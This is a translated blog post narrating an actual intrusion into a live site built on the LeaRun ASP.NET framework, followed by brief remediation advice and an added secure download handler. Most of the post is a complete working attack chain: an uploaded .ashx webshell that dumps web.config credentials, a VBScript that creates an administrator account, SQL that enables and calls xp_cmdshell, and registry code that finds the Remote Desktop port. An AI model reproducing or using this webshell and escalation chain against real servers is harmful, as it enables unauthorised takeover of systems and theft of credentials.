ASP.NET Website Intrusion, Second Wave (the LeaRun rapid informatization development framework taken down by the author)

Source: Internet
Author: User


My schooling stopped at primary school and my writing is poorly organized; where something is badly written, please just make do.

In the previous article I talked about how to get into the server by uploading files. This time we go a little further.

Let's go over the process first:

1. Upload a code page; I uploaded an ashx page.

2. Use the ashx page to display the contents of web.config and obtain the database connection string.

3. Use the ashx page to write a VBS script (a script that creates a Windows account) into the website root directory.

4. Enable xp_cmdshell on the database.

5. Use the database to run the VBS script in the website root directory. Intrusion complete.

The ashx code file is as follows:

/// <summary>
/// Display the configuration file
/// </summary>
/// <param name="context"></param>
public void ShowWebConfig(HttpContext context)
{
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/Web.config")));
}

/// <summary>
/// Write the VBS script
/// </summary>
/// <param name="context"></param>
public void WriteVbs(HttpContext context)
{
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"),
        "Set wsnetwork = CreateObject(\"WSCRIPT.NETWORK\")\r\n" +
        "OS = \"WinNT://\" & wsnetwork.ComputerName\r\n" +
        "Set ob = GetObject(OS) 'obtain the ADSI interface and bind\r\n" +
        "Set oe = GetObject(OS & \"/Administrators,group\") 'the Administrators group\r\n" +
        "Set od = ob.Create(\"user\", \"test\") 'create a user\r\n" +
        "od.SetPassword \"1234\" 'set the password\r\n" +
        "od.SetInfo 'save\r\n" +
        "Set of = GetObject(OS & \"/test\", user) 'get the user\r\n" +
        "oe.Add OS & \"/freeast\"\r\n");
}

/// <summary>
/// Execute SQL against the database
/// </summary>
/// <param name="connection"></param>
/// <param name="SQL"></param>
public void ExecuteSql(string connection, string SQL)
{
    using (SqlConnection con = new SqlConnection(connection))
    {
        using (SqlCommand commd = new SqlCommand(SQL, con))
        {
            con.Open();
            commd.ExecuteNonQuery();
            con.Close();
        }
    }
}

/// <summary>
/// Execute SQL against the database and output the result table
/// </summary>
/// <param name="context"></param>
/// <param name="connection"></param>
/// <param name="SQL"></param>
public void ExecuteSql1(HttpContext context, string connection, string SQL)
{
    System.Data.DataTable table = new System.Data.DataTable();
    using (SqlConnection con = new SqlConnection(connection))
    {
        using (SqlCommand commd = new SqlCommand(SQL, con))
        {
            con.Open();
            using (SqlDataAdapter ad = new SqlDataAdapter(commd))
            {
                ad.Fill(table);
            }
            con.Close();
        }
    }
    foreach (System.Data.DataRow row in table.Rows)
    {
        foreach (System.Data.DataColumn column in table.Columns)
        {
            context.Response.Write(row[column]);
            context.Response.Write("\t");
        }
        context.Response.Write("\r\n");
    }
}

/// <summary>
/// Display the Remote Desktop port
/// </summary>
/// <param name="context"></param>
private void ShowPort(HttpContext context)
{
    context.Response.Write(Microsoft.Win32.Registry.LocalMachine
        .OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp")
        .GetValue("PortNumber").ToString());
}

public void ProcessRequest(HttpContext context)
{
    context.Response.ContentType = "text/plain";
    try
    {
        var connection = context.Request.QueryString["connection"];
        switch (context.Request.QueryString["method"])
        {
            case "1":
                WriteVbs(context);
                break;
            case "2":
                ExecuteSql(connection, @"sp_configure 'show advanced options', 1
reconfigure");
                ExecuteSql(connection, @"sp_configure 'xp_cmdshell', 1
reconfigure"); // enable xp_cmdshell
                break;
            case "3":
                ExecuteSql1(context, connection,
                    "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
                break;
            case "4":
                ShowPort(context);
                break;
            default:
                ShowWebConfig(context);
                break;
        }
    }
    catch (Exception ex)
    {
        context.Response.Write(ex.Message);
    }
    context.Response.End();
}

public bool IsReusable
{
    get { return false; }
}


Here we take an online instance of the "LeaRun rapid informatization development framework" as the example.

I won't go over uploading files again. After the previous article someone asked how to display the contents of web.config, so I am posting the code here; it is actually very simple: File.ReadAllText on web.config is enough.

public void ShowWebConfig(HttpContext context)
{
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
}

After the request runs, the ashx page returns the database connection string.

The second step is the script that creates a Windows account.

Set wsnetwork = CreateObject("WSCRIPT.NETWORK")
OS = "WinNT://" & wsnetwork.ComputerName
Set ob = GetObject(OS)                           'obtain the ADSI interface and bind
Set oe = GetObject(OS & "/Administrators,group") 'the Administrators group
Set od = ob.Create("user", "test")               'create a user
od.SetPassword "1234"                            'set the password
od.SetInfo                                       'save
Set of = GetObject(OS & "/test", user)           'get the user
oe.Add OS & "/freeast"

Then enable xp_cmdshell on the database.

sp_configure 'show advanced options',1
reconfigure
Go
sp_configure 'xp_cmdshell',1
reconfigure


Finally, run the VBS script.

Exec master..xp_cmdshell 'cscript "script file path"'

The running result is as follows:


OK. This shows it worked directly.... That is, the server user was added successfully.

Next we want to get in over Remote Desktop. A port scanner showed 3389 closed, so we concluded the port had been changed and added a piece of code that reads the Remote Desktop port from the registry.

The Code is as follows:

/// <summary>
/// Display the Remote Desktop port
/// </summary>
/// <param name="context"></param>
private void ShowPort(HttpContext context)
{
    context.Response.Write(Microsoft.Win32.Registry.LocalMachine
        .OpenSubKey(@"SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp")
        .GetValue("PortNumber").ToString());
}


Now everything is done; open Remote Desktop Connection..

Because the site owner has not been reached yet, I fixed the vulnerability for the victim before posting this. So don't go trying it yourselves -.-!!!!

Now for the remedy. I will briefly introduce a few methods.

1. Store uploaded files outside the website, so they cannot be reached over the web (but remember to assign permissions). For example, if my website lives in d:\Web\Oa\, the files I upload can be stored in d:\File\OA, where others cannot access them directly.

2. Create a web.config in the upload directory that rejects all requests. (C# code can still read the files, but they must be output with Response.WriteFile.)

3. Compress everything.

................
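As an added example (not the author's code and not part of LeaRun), here is how remedies 1 and 2 fit together: uploads live in d:\File\OA, the path from the author's example, where the web server never executes them, and the only way content leaves that folder is a handler that maps a requested name to a canonical path inside the root, refuses anything that escapes it or carries a script extension, and streams it with Response.WriteFile. The handler name, the `name` query parameter and the extension whitelist are assumptions.

```csharp
using System;
using System.IO;
using System.Web;

// Added example, not the author's code. Serves files that were stored outside the
// web root (remedy 1) and that a per-directory web.config keeps IIS from serving
// directly (remedy 2); Response.WriteFile is the output path the author names.
public class DownloadHandler : IHttpHandler
{
    // Assumed upload location, taken from the author's d:\File\OA example.
    public static readonly string UploadRoot = @"d:\File\OA";

    // Assumed whitelist: only these are ever served; .ashx, .aspx, .vbs etc. are refused.
    static readonly string[] AllowedExtensions = { ".pdf", ".png", ".jpg", ".docx", ".xlsx" };

    // Maps a user-supplied file name to a full path under uploadRoot, or returns null
    // when the name escapes the root (..\ segments, drive-qualified names) or has an
    // extension that is not on the whitelist.
    public static string ResolveUploadPath(string uploadRoot, string requestedName)
    {
        if (string.IsNullOrEmpty(requestedName)) return null;
        string root = Path.GetFullPath(uploadRoot).TrimEnd(Path.DirectorySeparatorChar)
                      + Path.DirectorySeparatorChar;
        // Path.Combine returns the second argument unchanged when it is absolute,
        // so the StartsWith check below also catches "d:\Web\Oa\web.config".
        string full = Path.GetFullPath(Path.Combine(root, requestedName));
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase)) return null;
        string ext = Path.GetExtension(full).ToLowerInvariant();
        if (Array.IndexOf(AllowedExtensions, ext) < 0) return null;
        return full;
    }

    public void ProcessRequest(HttpContext context)
    {
        string path = ResolveUploadPath(UploadRoot, context.Request.QueryString["name"]);
        if (path == null || !File.Exists(path))
        {
            context.Response.StatusCode = 404;   // same answer for traversal, bad extension, missing file
            return;
        }
        // Force a download so the browser never interprets the bytes as a page.
        context.Response.ContentType = "application/octet-stream";
        context.Response.AppendHeader("Content-Disposition",
            "attachment; filename=\"" + Path.GetFileName(path) + "\"");
        context.Response.WriteFile(path);
    }

    public bool IsReusable { get { return true; } }
}
```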

 

Now go sort through your earlier projects and patch whatever can be patched.... Never use these vulnerabilities to do bad things,... or you will be invited in for tea.... -.-!!!!!
